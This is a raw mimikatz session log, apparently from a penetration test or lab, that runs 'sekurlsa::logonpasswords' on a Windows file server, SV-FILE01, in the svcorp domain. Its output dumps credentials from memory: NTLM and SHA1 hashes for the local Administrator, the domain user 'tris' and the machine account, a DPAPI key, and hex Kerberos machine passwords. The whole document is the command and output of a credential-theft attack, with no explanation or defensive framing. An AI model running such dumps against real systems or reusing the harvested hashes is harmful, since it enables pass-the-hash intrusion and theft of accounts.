mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 313194 (00000000:0004c76a)
Session           : Interactive from 0
User Name         : Administrator
Domain            : SV-FILE01
Logon Server      : SV-FILE01
Logon Time        : 1/17/2023 11:42:01 AM
SID               : S-1-5-21-1778687363-177302961-343062978-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : SV-FILE01
         * NTLM     : f4ada15ad8818bf28967bf80ec3e5d9d
         * SHA1     : a2ab48c1a36cf017fcad4e92d9fd7f5ba585620f
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : SV-FILE01
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : SV-FILE01
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 61306 (00000000:0000ef7a)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/17/2023 11:39:44 AM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : SV-FILE01$
         * Domain   : svcorp
         * NTLM     : 4f5f920f5fa0d4bbc8aab18138253909
         * SHA1     : f4abb676a66e168c2f5592dbf4229315fc4ced95
        tspkg :
        wdigest :
         * Username : SV-FILE01$
         * Domain   : svcorp
         * Password : (null)
        kerberos :
         * Username : SV-FILE01$
         * Domain   : svcorp.com
         * Password : 9d 5b 8d 6f 66 81 41 63 b3 01 74 a9 d6 55 d5 ca 43 29 26 57 1e 0c 5d b9 28 2e 93 d4 12 5e 69 e2 27 64 ca cc b4 8e bb 0c 7b f4 4d b2 dd 28 3c 00 77 7d 63 2b 5e 80 58 10 ef 55 73 e4 e5 6e 1b 86 8e 9a 0b 88 67 6b 0a 61 07 71 42 b5 2b 01 be d0 25 cc a3 02 5f ee bc 9b fa 8a 8a a2 27 f7 d6 c7 4a 54 35 f0 d1 19 cc f8 f7 b9 56 c6 7c 42 7b a7 1e db 8c c9 93 be e3 a0 40 8c e4 b7 78 c5 65 fd 59 a3 69 fd 5b fe 89 ae 5e 50 63 b4 db a5 de 0e 08 e3 19 7a 41 48 41 7f 68 e5 fe 1d ce 81 05 78 99 7d a9 23 21 6b dd 66 21 94 d3 a1 ea e8 f1 ae a1 99 ea 53 01 8c 2f 14 09 b2 6d 50 d5 7a 34 40 0c 75 da f5 3b ac c1 c0 fd 12 3d a9 f4 82 5f 6e 81 d4 f7 fe e0 15 68 26 c9 db a2 42 85 f2 eb 3b bf 2b d3 3d 18 b0 1b fc 32 4c 83 5e 0b d6 82 47
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : SV-FILE01$
Domain            : svcorp
Logon Server      : (null)
Logon Time        : 1/17/2023 11:39:44 AM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : SV-FILE01$
         * Domain   : svcorp
         * NTLM     : 5742e27ab7454590b13d84b16353c753
         * SHA1     : c114c567236d3fc2c508e51cd606002eaca57bbe
        tspkg :
        wdigest :
         * Username : SV-FILE01$
         * Domain   : svcorp
         * Password : (null)
        kerberos :
         * Username : sv-file01$
         * Domain   : SVCORP.COM
         * Password : 0c f2 1d aa 52 43 aa d5 e2 30 ac 6d 4e ef 37 c8 a7 cc 82 3e b5 db cf 72 f8 32 5a 9e b1 8b 0d 09 b5 7c 9a 5d e6 ba 24 84 21 ab e2 a7 82 57 3d 00 6c 86 58 1c 2c 82 d1 02 04 e2 f9 16 85 c4 d7 ab 9d 0e c3 76 11 8d b0 10 63 80 11 3c c0 05 f9 fa 74 42 44 b2 a1 04 34 8d 19 8b b5 16 23 a9 a7 c6 0a ce a0 c3 93 fb 76 ee 33 44 25 33 0f 2a 56 41 37 cc fe 16 76 61 3d db 99 de 75 48 de ca 26 0a 86 00 2e 77 82 ad a9 05 dc 7d 18 d7 f4 7f d5 08 0e d8 21 fc 99 62 97 a5 35 67 e5 60 46 3b e4 c7 c6 bb 74 3f 8b 15 0a a1 6b 2f 6c fd ae 0c 19 87 e8 44 35 04 92 98 87 2b 0f 4c 47 2e 3e dd f1 a8 5d 10 24 97 f2 a3 58 c8 f4 be a1 25 05 3b fa 77 06 3c f6 0f 72 8f a3 00 6b 62 8d da bf 31 70 ec e0 8f 97 db 9d 2d 90 3e 23 62 b9 cd ab ea 1b 30
        ssp :
        credman :

Authentication Id : 0 ; 373281 (00000000:0005b221)
Session           : Interactive from 0
User Name         : Administrator
Domain            : SV-FILE01
Logon Server      : SV-FILE01
Logon Time        : 4/13/2023 3:11:22 PM
SID               : S-1-5-21-1778687363-177302961-343062978-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : SV-FILE01
         * NTLM     : f4ada15ad8818bf28967bf80ec3e5d9d
         * SHA1     : a2ab48c1a36cf017fcad4e92d9fd7f5ba585620f
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : SV-FILE01
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : SV-FILE01
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 195337 (00000000:0002fb09)
Session           : Interactive from 1
User Name         : tris
Domain            : svcorp
Logon Server      : SV-DC01
Logon Time        : 1/17/2023 11:40:10 AM
SID               : S-1-5-21-466546139-763938477-1796994327-1124
        msv :
         [00000003] Primary
         * Username : tris
         * Domain   : svcorp
         * NTLM     : 08df3c73ded940e1f2bcf5eea4b8dbf6
         * SHA1     : b6e8eb6ec416d510bd082d72d687b2f41d6b5dc3
         * DPAPI    : 2800a2930c81ce49f9cc565282754433
        tspkg :
        wdigest :
         * Username : tris
         * Domain   : svcorp
         * Password : (null)
        kerberos :
         * Username : tris
         * Domain   : SVCORP.COM
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 195314 (00000000:0002faf2)
Session           : Interactive from 1
User Name         : tris
Domain            : svcorp
Logon Server      : SV-DC01
Logon Time        : 1/17/2023 11:40:10 AM
SID               : S-1-5-21-466546139-763938477-1796994327-1124
        msv :
         [00000003] Primary
         * Username : tris
         * Domain   : svcorp
         * NTLM     : 08df3c73ded940e1f2bcf5eea4b8dbf6
         * SHA1     : b6e8eb6ec416d510bd082d72d687b2f41d6b5dc3
         * DPAPI    : 2800a2930c81ce49f9cc565282754433
        tspkg :
        wdigest :
         * Username : tris
         * Domain   : svcorp
         * Password : (null)
        kerberos :
         * Username : tris
         * Domain   : SVCORP.COM
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 1/17/2023 11:39:46 AM
SID               : S-1-5-17
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 1/17/2023 11:39:44 AM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 61287 (00000000:0000ef67)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/17/2023 11:39:44 AM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : SV-FILE01$
         * Domain   : svcorp
         * NTLM     : 5742e27ab7454590b13d84b16353c753
         * SHA1     : c114c567236d3fc2c508e51cd606002eaca57bbe
        tspkg :
        wdigest :
         * Username : SV-FILE01$
         * Domain   : svcorp
         * Password : (null)
        kerberos :
         * Username : SV-FILE01$
         * Domain   : svcorp.com
         * Password : 0c f2 1d aa 52 43 aa d5 e2 30 ac 6d 4e ef 37 c8 a7 cc 82 3e b5 db cf 72 f8 32 5a 9e b1 8b 0d 09 b5 7c 9a 5d e6 ba 24 84 21 ab e2 a7 82 57 3d 00 6c 86 58 1c 2c 82 d1 02 04 e2 f9 16 85 c4 d7 ab 9d 0e c3 76 11 8d b0 10 63 80 11 3c c0 05 f9 fa 74 42 44 b2 a1 04 34 8d 19 8b b5 16 23 a9 a7 c6 0a ce a0 c3 93 fb 76 ee 33 44 25 33 0f 2a 56 41 37 cc fe 16 76 61 3d db 99 de 75 48 de ca 26 0a 86 00 2e 77 82 ad a9 05 dc 7d 18 d7 f4 7f d5 08 0e d8 21 fc 99 62 97 a5 35 67 e5 60 46 3b e4 c7 c6 bb 74 3f 8b 15 0a a1 6b 2f 6c fd ae 0c 19 87 e8 44 35 04 92 98 87 2b 0f 4c 47 2e 3e dd f1 a8 5d 10 24 97 f2 a3 58 c8 f4 be a1 25 05 3b fa 77 06 3c f6 0f 72 8f a3 00 6b 62 8d da bf 31 70 ec e0 8f 97 db 9d 2d 90 3e 23 62 b9 cd ab ea 1b 30
        ssp :
        credman :

Authentication Id : 0 ; 32788 (00000000:00008014)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 1/17/2023 11:39:43 AM
SID               :
        msv :
         [00000003] Primary
         * Username : SV-FILE01$
         * Domain   : svcorp
         * NTLM     : 5742e27ab7454590b13d84b16353c753
         * SHA1     : c114c567236d3fc2c508e51cd606002eaca57bbe
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : SV-FILE01$
Domain            : svcorp
Logon Server      : (null)
Logon Time        : 1/17/2023 11:39:43 AM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : SV-FILE01$
         * Domain   : svcorp
         * Password : (null)
        kerberos :
         * Username : sv-file01$
         * Domain   : SVCORP.COM
         * Password : 0c f2 1d aa 52 43 aa d5 e2 30 ac 6d 4e ef 37 c8 a7 cc 82 3e b5 db cf 72 f8 32 5a 9e b1 8b 0d 09 b5 7c 9a 5d e6 ba 24 84 21 ab e2 a7 82 57 3d 00 6c 86 58 1c 2c 82 d1 02 04 e2 f9 16 85 c4 d7 ab 9d 0e c3 76 11 8d b0 10 63 80 11 3c c0 05 f9 fa 74 42 44 b2 a1 04 34 8d 19 8b b5 16 23 a9 a7 c6 0a ce a0 c3 93 fb 76 ee 33 44 25 33 0f 2a 56 41 37 cc fe 16 76 61 3d db 99 de 75 48 de ca 26 0a 86 00 2e 77 82 ad a9 05 dc 7d 18 d7 f4 7f d5 08 0e d8 21 fc 99 62 97 a5 35 67 e5 60 46 3b e4 c7 c6 bb 74 3f 8b 15 0a a1 6b 2f 6c fd ae 0c 19 87 e8 44 35 04 92 98 87 2b 0f 4c 47 2e 3e dd f1 a8 5d 10 24 97 f2 a3 58 c8 f4 be a1 25 05 3b fa 77 06 3c f6 0f 72 8f a3 00 6b 62 8d da bf 31 70 ec e0 8f 97 db 9d 2d 90 3e 23 62 b9 cd ab ea 1b 30
        ssp :
        credman :

mimikatz #